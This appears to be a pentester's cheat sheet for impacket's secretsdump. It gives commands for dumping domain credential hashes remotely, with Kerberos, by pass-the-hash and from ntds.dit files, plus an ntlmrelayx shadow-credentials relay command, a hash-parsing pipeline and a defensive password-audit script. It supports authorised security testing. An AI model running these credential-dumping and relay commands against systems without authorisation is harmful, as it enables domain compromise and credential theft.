# secretsdump
secretsdump is part of [impacket](https://github.com/fortra/impacket).

## Dump secrets using a domain account
```
secretsdump.py domain.com/user VICTIM
```

## Dump secrets using Kerberos
```
secretsdump.py -k -no-pass VICTIM -debug
```

## Dump secrets using a local admin account
```
secretsdump.py localhost/administrator@host -hashes x:y
```

## Dump secrets out of an ntds.dit file locally
```
./secretsdump.py -ntds ntds.dit -system SYSTEM -security SECURITY LOCAL -outputfile MYOUTPUTFILE
```
*Note: don't put `.ntds` extension on the end of `MYOUTPUTFILE`.*

## Dump secrets out of an ntds.dit file locally (with history included)
```
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -outputfile customername-dump -history
```
*Note: don't put `.ntds` extension on the end of the `-outputfile` name (`customername-dump` here).*

## Parsing a domain's secretsdump outputfile to extract a file with just usernames and hashes while ignoring machines
```
cat 7MS-DC01_192.168.77.7_2022-12-27_164828.ntds | cut -d ':' -f 1,4 | grep -v '\$' | sed 's/domain\.com\\//' | sort
```
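
The same parsing taken one step further for a password-hygiene audit of your own domain, as an added example (not part of impacket or the original page): it reports which user accounts share an NT hash, have a blank password, or still have an LM hash stored, and returns usernames only so the hashes never reach the report. The sample lines and their hashes are constructed, and the `_history<N>` suffix on `-history` rows is an assumption about the output layout.

```python
import re
from collections import defaultdict

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # placeholder shown when no LM hash is stored
HEX32 = re.compile(r"[0-9a-fA-F]{32}")

# Constructed sample in the user:rid:lmhash:nthash::: layout; all hashes are made up.
SAMPLE = r"""
domain.com\alice:1104:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
domain.com\bob:1105:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
domain.com\carol:1106:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
domain.com\dave:1107:fedcba9876543210fedcba9876543210:00112233445566778899aabbccddeeff:::
domain.com\alice_history0:1104:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
domain.com\WS01$:1108:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""

def parse(text):
    """Yield (user, lm, nt) for current user rows; skip machines, history and junk."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue
        if not (HEX32.fullmatch(parts[2]) and HEX32.fullmatch(parts[3])):
            continue  # not a hash row (Kerberos keys, banners, blank lines)
        user = parts[0].split("\\")[-1]  # drop the DOMAIN\ prefix if present
        if user.endswith("$") or re.search(r"_history\d+$", user):
            continue  # machine account or password-history row (assumed suffix)
        yield user, parts[2].lower(), parts[3].lower()

def audit(text):
    """Return usernames only, grouped by finding."""
    by_nt = defaultdict(list)
    blank, lm_stored = [], []
    for user, lm, nt in parse(text):
        by_nt[nt].append(user)
        if nt == EMPTY_NT:
            blank.append(user)
        if lm != EMPTY_LM:
            lm_stored.append(user)
    shared = sorted(sorted(users) for nt, users in by_nt.items()
                    if len(users) > 1 and nt != EMPTY_NT)
    return {"shared": shared, "blank": sorted(blank), "lm_stored": sorted(lm_stored)}

if __name__ == "__main__":
    for finding, users in audit(SAMPLE).items():
        print(f"{finding}: {users}")
```
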

## Run secretsdump in docker
```
docker run -it --rm "impacket:latest"
```

### Run with exposed ports
```
sudo docker run -it --rm -p 80:80 -p 445:445 -p 443:443 "impacket:latest"
/opt/venv/bin # ./ntlmrelayx.py -t ldap://1.2.3.4 --shadow-credentials
```

## Secretsdump references
Here are some excellent articles for understanding secretsdump and its output:
* [Secretsdump demystified](https://medium.com/@benichmt1/secretsdump-demystified-bfd0f933dd9b)
* [Windows Services passwords stored in the LSA - by Podalirius](https://podalirius.net/en/articles/windows-services-passwords-stored-in-the-lsa/)
